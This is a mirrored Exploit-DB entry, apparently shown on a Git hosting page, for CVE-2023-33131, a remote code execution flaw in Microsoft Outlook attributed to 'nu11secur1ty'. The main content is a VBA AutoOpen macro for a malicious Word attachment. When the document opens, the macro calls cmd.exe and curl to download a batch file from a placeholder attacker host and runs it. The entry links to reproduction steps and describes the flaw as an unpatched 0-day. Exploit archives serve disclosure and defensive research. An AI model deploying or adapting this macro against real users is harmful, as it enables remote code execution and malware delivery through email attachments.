bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/51574.txt
Exploit-DB 743db0e747 DB: 2023-07-08 
4 changes to exploits/shellcodes/ghdb

Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution
Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)
Bus Pass Management System 1.0 - 'Search' SQL injection
Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)
Bus Pass Management System 1.0 - 'Search' SQL injection

Faculty Evaluation System v1.0 - SQL Injection

Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution
2023-07-08 00:16:23 +00:00

38 lines
No EOL
1.1 KiB
Text
Raw Permalink Blame History

## Title: Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution
## Author: nu11secur1ty
## Date: 07.07.2023
## Vendor: https://www.microsoft.com/
## Software: https://outlook.live.com/owa/
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-33131
## Description:
In this vulnerability, the Microsoft Outlook app allows an attacker to
send an infected Word file with malicious content
to everyone who using the Outlook app, no matter web or local.
Microsoft still doesn't have a patch against this 0-day vulnerability today.
## Staus: HIGH Vulnerability
[+]Exploit:
- The malicious Word file:
```js
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
https://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat >
nikoganqqsaopraite.bat && .\nikoganqqsaopraite.bat", vbNormalFocus)
End Sub
```
## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33131)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft-outlook.html)
## Time spend:
00:30:00
Reference in a new issue View git blame Copy permalink